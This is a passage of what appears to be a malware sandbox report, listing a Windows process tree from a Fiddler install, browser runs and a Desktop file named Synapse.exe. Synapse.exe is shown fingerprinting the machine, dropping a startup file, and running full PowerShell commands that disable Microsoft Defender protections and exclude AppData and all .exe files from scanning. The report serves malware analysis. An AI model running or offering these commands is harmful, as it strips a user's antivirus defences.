    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 30c -InterruptEvent 0 -NGENProcess 300 -Pipe 328 -Comment "NGen Worker Process"
        5⤵
        Drops file in Windows directory
        
        PID:4796
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 304 -InterruptEvent 0 -NGENProcess 2ec -Pipe 2d0 -Comment "NGen Worker Process"
        5⤵
        Drops file in Windows directory
        
        PID:5232
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe" install "C:\Users\Admin\AppData\Local\Programs\Fiddler\EnableLoopback.exe"
      4⤵
      PID:1784
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 1e8 -InterruptEvent 0 -NGENProcess 1d8 -Pipe 1e4 -Comment "NGen Worker Process"
        5⤵
        
        PID:4588
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 270 -InterruptEvent 0 -NGENProcess 288 -Pipe 1d8 -Comment "NGen Worker Process"
        5⤵
        Drops file in Windows directory
        
        PID:5612
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2b4 -InterruptEvent 0 -NGENProcess 298 -Pipe 2a0 -Comment "NGen Worker Process"
        5⤵
        Drops file in Windows directory
        
        PID:5640
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2c4 -InterruptEvent 0 -NGENProcess 288 -Pipe 2c8 -Comment "NGen Worker Process"
        5⤵
        Drops file in Windows directory
        
        PID:5952
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2c4 -InterruptEvent 0 -NGENProcess 2e0 -Pipe 29c -Comment "NGen Worker Process"
        5⤵
        Drops file in Windows directory
        
        PID:4308
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2d0 -InterruptEvent 0 -NGENProcess 2e4 -Pipe 270 -Comment "NGen Worker Process"
        5⤵
        Drops file in Windows directory
        
        PID:1776
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 288 -InterruptEvent 0 -NGENProcess 2dc -Pipe 2d0 -Comment "NGen Worker Process"
        5⤵
        Drops file in Windows directory
        
        PID:4484
  - - C:\Users\Admin\AppData\Local\Programs\Fiddler\SetupHelper
      "C:\Users\Admin\AppData\Local\Programs\Fiddler\SetupHelper" /a "C:\Users\Admin\AppData\Local\Programs\Fiddler"
      4⤵
      Executes dropped EXE
      PID:2500
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://fiddler2.com/r/?Fiddler2FirstRun
      4⤵
      Enumerates system info in registry
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      PID:4800
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffc3f0b46f8,0x7ffc3f0b4708,0x7ffc3f0b4718
        5⤵
        
        PID:4072
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1940,6251316911175827117,4516157926906682365,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1952 /prefetch:2
        5⤵
        
        PID:396
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1940,6251316911175827117,4516157926906682365,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2324 /prefetch:3
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1128
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1940,6251316911175827117,4516157926906682365,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2776 /prefetch:8
        5⤵
        
        PID:4380
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,6251316911175827117,4516157926906682365,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3216 /prefetch:1
        5⤵
        
        PID:5124
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,6251316911175827117,4516157926906682365,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3224 /prefetch:1
        5⤵
        
        PID:5132

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
1⤵
PID:3676

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:876

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5472

C:\Users\Admin\AppData\Local\Programs\Fiddler\Fiddler.exe
"C:\Users\Admin\AppData\Local\Programs\Fiddler\Fiddler.exe"
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:5724

C:\Users\Admin\AppData\Local\Programs\Fiddler\Fiddler.exe
"C:\Users\Admin\AppData\Local\Programs\Fiddler\Fiddler.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4220
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://fiddler2.com/r/?Win8EL
  2⤵
  - Enumerates system info in registry
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:4532
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc3f0b46f8,0x7ffc3f0b4708,0x7ffc3f0b4718
    3⤵
    PID:2492
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,228643789653907738,18336518007751658538,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2100 /prefetch:2
    3⤵
    PID:2032
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2088,228643789653907738,18336518007751658538,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2276 /prefetch:3
    3⤵
    PID:5368
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2088,228643789653907738,18336518007751658538,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3036 /prefetch:8
    3⤵
    PID:6120
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,228643789653907738,18336518007751658538,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2124 /prefetch:1
    3⤵
    PID:4660
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,228643789653907738,18336518007751658538,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3256 /prefetch:1
    3⤵
    PID:3768

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
PID:1600

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4792

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1048

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: GetForegroundWindowSpam
PID:5724

C:\Users\Admin\AppData\Local\Programs\Fiddler\Fiddler.exe
"C:\Users\Admin\AppData\Local\Programs\Fiddler\Fiddler.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5352
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://fiddler2.com/r/?Win8EL
  2⤵
  - Enumerates system info in registry
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  PID:2376
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc3f0b46f8,0x7ffc3f0b4708,0x7ffc3f0b4718
    3⤵
    PID:5344
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2052,6695715534098319481,4333479522280947722,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2080 /prefetch:2
    3⤵
    PID:392
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2052,6695715534098319481,4333479522280947722,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2132 /prefetch:3
    3⤵
    PID:5812
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2052,6695715534098319481,4333479522280947722,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2804 /prefetch:8
    3⤵
    PID:4844
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,6695715534098319481,4333479522280947722,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3244 /prefetch:1
    3⤵
    PID:2812
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,6695715534098319481,4333479522280947722,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3264 /prefetch:1
    3⤵
    PID:5164

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
PID:5892

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5316

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5748

C:\Users\Admin\AppData\Local\Programs\Fiddler\Fiddler.exe
"C:\Users\Admin\AppData\Local\Programs\Fiddler\Fiddler.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4128

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
PID:5456

C:\Users\Admin\AppData\Local\Programs\Fiddler\Fiddler.exe
"C:\Users\Admin\AppData\Local\Programs\Fiddler\Fiddler.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4528

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
PID:5776

C:\Users\Admin\Desktop\Synapse.exe
"C:\Users\Admin\Desktop\Synapse.exe"
1⤵
PID:5376
- C:\Users\Admin\Desktop\Synapse.exe
  "C:\Users\Admin\Desktop\Synapse.exe"
  2⤵
  - Drops startup file
  PID:4572
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:2984
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:1320
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'" "
    3⤵
    PID:3544
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      PID:4236
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\AppData"
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:5716
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\Local"
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:4352
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:396

C:\Users\Admin\AppData\Local\Programs\Fiddler\Fiddler.exe
"C:\Users\Admin\AppData\Local\Programs\Fiddler\Fiddler.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5616

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
PID:5644

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:4832
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffc57e446f8,0x7ffc57e44708,0x7ffc57e44718
  2⤵
  PID:3680
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2208,3388934127713207606,13747323988854241057,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2216 /prefetch:2
  2⤵
  PID:5896
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2208,3388934127713207606,13747323988854241057,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2280 /prefetch:3
  2⤵
  PID:5140
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2208,3388934127713207606,13747323988854241057,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2760 /prefetch:8
  2⤵
  PID:5768
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,3388934127713207606,13747323988854241057,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3420 /prefetch:1
  2⤵
  PID:5732
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,3388934127713207606,13747323988854241057,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3428 /prefetch:1
  2⤵
  PID:5808
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,3388934127713207606,13747323988854241057,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4512 /prefetch:1
  2⤵
  PID:3564
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,3388934127713207606,13747323988854241057,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4716 /prefetch:1
  2⤵
  PID:1860
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2208,3388934127713207606,13747323988854241057,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3700 /prefetch:8
  2⤵
  PID:3416
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2208,3388934127713207606,13747323988854241057,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3700 /prefetch:8
  2⤵
  PID:3472
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,3388934127713207606,13747323988854241057,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4472 /prefetch:1
  2⤵
  PID:3748
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,3388934127713207606,13747323988854241057,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4168 /prefetch:1
  2⤵
  PID:5992
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,3388934127713207606,13747323988854241057,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4756 /prefetch:1
  2⤵
  PID:4368

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2228

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3576

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:2500
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc4fbdab58,0x7ffc4fbdab68,0x7ffc4fbdab78
  2⤵
  PID:5960
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1768 --field-trial-handle=1932,i,2395606031662800657,2578720705885422790,131072 /prefetch:2
  2⤵
  PID:5928
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 --field-trial-handle=1932,i,2395606031662800657,2578720705885422790,131072 /prefetch:8
  2⤵
  PID:3520
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2260 --field-trial-handle=1932,i,2395606031662800657,2578720705885422790,131072 /prefetch:8
  2⤵
  PID:1784
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3132 --field-trial-handle=1932,i,2395606031662800657,2578720705885422790,131072 /prefetch:1
  2⤵
  PID:4988
- C:\Program Files\Google\Chrome\Application\chrome.exe
